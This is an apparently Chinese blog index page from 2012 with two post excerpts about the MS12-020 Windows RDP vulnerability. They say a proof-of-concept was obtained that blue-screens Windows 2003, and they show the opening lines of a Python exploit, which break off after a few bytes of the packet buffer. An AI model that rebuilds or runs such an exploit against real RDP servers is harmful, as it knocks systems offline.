摘要: 白天搜到的,python版本测试成功。上一篇就是根据这篇。转自Silic Group: http://bbs.blackbap.org/thread-2419-1-1.html 本文末尾将付上MS12-020真正的PoC,编写语言为ruby和python两个版本的,还有一个exe程序,均不需要什么freerdp包之类的东西。Sabu写的那个不是MS12-020的shellcode,而是2008年Apache 1.2.19的远程命令执行漏洞的EXP修改来的。真正的PoC除了本文帖子,其他的地方还真没流传出来。 新闻把这个炒作起来,完全是在微软推送补丁以后看漏洞的介绍和波及范围而炒作的。PoC.. 阅读全文
posted @ 2012-03-16 20:23 涅槃小鸟 阅读(1034) 评论(0) 推荐(0) 编辑
摘要: 经过验证,成功造成windows2003 sp2蓝屏蓝屏代码为:0x0000008e (0xc0000005, 0xf753888c, 0xbafcf964, 0x00000000)截图为:最后是最重要的的POC代码了:转自(http://bbs.blackbap.org/thread-2419-1-1.html)注:运行环境为BT5-R1#!/usr/bin/env pythonimport socketimport sysbuf=""buf+="\x03\x00\x00\x13\x0e\xe0\x00\x00" buf+="\x00\x00 阅读全文
posted @ 2012-03-16 14:22 涅槃小鸟 阅读(4996) 评论(0) 推荐(0) 编辑